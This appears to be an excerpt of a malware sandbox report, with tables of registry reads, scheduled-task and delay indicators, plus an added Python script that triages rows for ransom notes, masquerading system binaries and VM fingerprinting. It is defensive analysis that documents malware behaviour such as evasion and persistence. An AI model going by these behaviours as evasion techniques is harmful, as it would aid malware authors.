| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\D7NyfNn2ltpUP1kEt4R9InkN.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
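The tables above mix the sample's own behaviour with ordinary OS activity: almost every SCSI and CentralProcessor row comes from svchost.exe, DrvInst.exe (driver installation after the MaskVPN tapinstall.exe run) or WerFault.exe (crash reporting after the "Program crash" events), and only a handful come from binaries under C:\Users\Admin\Documents and AppData\Local\Temp. The script below is an added triage example, not part of the sandbox report and not the sandbox vendor's code. It parses pipe-delimited rows of this shape and applies three heuristics of my own: a ransom-note filename on a "File created" row, a process named like a Windows system binary (here TrustedInstaller.exe) running from a user-writable directory, and a process outside C:\Windows or Program Files reading hardware identity keys that are commonly used to fingerprint virtual machines. The sample rows are copied from the tables on this page; the rule names and the trusted-path and system-binary lists are assumptions chosen for the example.

```python
"""
Triage helper for sandbox behaviour tables.

Added example (not from the sandbox report). Parses rows of the form
    | Description | Indicator | Process | Target |
and applies three heuristic rules to separate the sample's activity from
the OS noise (svchost.exe, DrvInst.exe, WerFault.exe) in the same tables:

  ransom_note     - "File created" whose file name matches a ransom-note pattern
  masquerade      - image name of a Windows system binary, but the path is under
                    a user-writable directory (e.g. AppData\Roaming\...\TrustedInstaller.exe)
  vm_fingerprint  - a process outside C:\Windows / Program Files reading
                    Enum\SCSI or HARDWARE\DESCRIPTION\System keys (VM fingerprinting)
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    description: str
    indicator: str
    process: str
    target: str


# Heuristic lists; assumptions for this example, tune them for your own environment.
SYSTEM_BINARY_NAMES = {
    "trustedinstaller.exe", "svchost.exe", "csrss.exe", "lsass.exe",
    "explorer.exe", "msiexec.exe", "werfault.exe",
}
USER_WRITABLE = re.compile(
    r"^c:\\users\\[^\\]+\\(?:appdata|documents|downloads|desktop)\\", re.I)
TRUSTED_PATHS = re.compile(
    r"^c:\\(?:windows|program files(?: \(x86\))?)\\", re.I)
RANSOM_NOTE = re.compile(
    r"all your files are encrypted|readme.*decrypt|how.*decrypt|recover.*files", re.I)
HARDWARE_KEYS = re.compile(
    r"\\REGISTRY\\MACHINE\\(?:SYSTEM\\ControlSet\d+\\Enum\\SCSI"
    r"|HARDWARE\\DESCRIPTION\\System)(?:\\|$)", re.I)


def parse_rows(text: str) -> list[Event]:
    """Turn pipe-delimited table rows into Event records, skipping header rows."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":
            continue
        events.append(Event(*cells))
    return events


def classify(ev: Event) -> list[str]:
    """Return the names of every rule this single event trips."""
    hits = []
    image = ev.process.rsplit("\\", 1)[-1].lower()
    file_name = ev.indicator.rsplit("\\", 1)[-1]
    if ev.description == "File created" and RANSOM_NOTE.search(file_name):
        hits.append("ransom_note")
    if image in SYSTEM_BINARY_NAMES and USER_WRITABLE.match(ev.process):
        hits.append("masquerade")
    if (ev.description.startswith("Key") and HARDWARE_KEYS.search(ev.indicator)
            and ev.process != "N/A" and not TRUSTED_PATHS.match(ev.process)):
        hits.append("vm_fingerprint")
    return hits


def triage(text: str) -> dict[str, dict[str, int]]:
    """Aggregate rule hits per process: {process_path: {rule_name: count}}."""
    report: dict[str, dict[str, int]] = {}
    for ev in parse_rows(text):
        for rule in classify(ev):
            per_proc = report.setdefault(ev.process, {})
            per_proc[rule] = per_proc.get(rule, 0) + 1
    return report


# Rows copied from the behaviour tables on this page (a small subset).
SAMPLE_ROWS = r"""
| Description | Indicator | Process | Target |
| File created | C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\DcuJbapcOStMsK_sofvjH1rd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
"""

if __name__ == "__main__":
    for process, rules in triage(SAMPLE_ROWS).items():
        print(process, rules)
```

Run against the sample rows, only three processes survive: the AppData\Roaming TrustedInstaller.exe (ransom note plus masquerade), the Documents\*.exe that enumerates Enum\SCSI, and Temp\EA23.exe reading CentralProcessor values; svchost.exe, DrvInst.exe and WerFault.exe drop out. Path-based trust is deliberately coarse: it also hides the MaskVPN tapinstall.exe rows under Program Files (x86), so treat the output as a first cut for prioritising rows, not as a verdict.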
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\EA23.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
